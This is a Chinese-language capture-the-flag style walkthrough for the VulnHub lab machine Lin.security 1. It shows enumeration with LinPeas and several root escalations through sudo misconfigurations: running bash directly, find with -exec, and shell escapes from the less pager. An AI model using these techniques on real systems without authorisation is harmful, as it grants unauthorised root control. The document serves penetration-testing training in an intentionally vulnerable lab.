
准备工作
靶机基本信息
靶机名称:
Lin.security 1
操作系统:Linux
网络连接方式:桥接至物理网络
渗透测试目标:提权至root
用户
靶机登录信息:bob/secret
下载地址:1. Lin.Security: 1 ~ VulnHub
环境配置
从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation
主页的File
=> Open
按钮,在弹出的文件选择窗口中选中Lin.security.ovf
文件打开后即可导入靶机。使用上面给出的登录凭据即可登录系统进行提权练习。
P.S. 本台靶机只有权限提升部分哦~
权限提升
本地信息收集
登录系统之后,首先上传LinPeas
工具进行信息收集。
系统基本信息
部分CVE漏洞信息
容器软件信息
系统进程信息
计划任务信息
系统用户信息

特殊权限文件
Sudo命令
bash提权
因为使用sudo
命令之后发现可以运行各种终端,因此我们可以直接使用sudo
运行终端软件提权:
shell
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~#
常用命令提权
除了各种终端软件,我们还可以使用诸如awk
、find
这种命令进行提权。下面介绍find
命令提权:
shell
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo find . -exec /bin/bash \; -quit
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~#
find
命令有一个可以用于执行任意系统命令的危险参数-exec
。 这里允许使用sudo
运行find
命令,因此该命令会以root
权限执行/bin/bash
。
文本分页查看工具提权
一些可以分页查看文本的工具,诸如less
、more
、man
等,在其文本查看界面可以使用!
符号执行系统命令,但前提是必须使用这些工具查看大文件(如/var/log/syslog
),这样才能触发它们的分页查看功能。
shell
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo less /var/log/syslog
[sudo] password for bob:
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~#
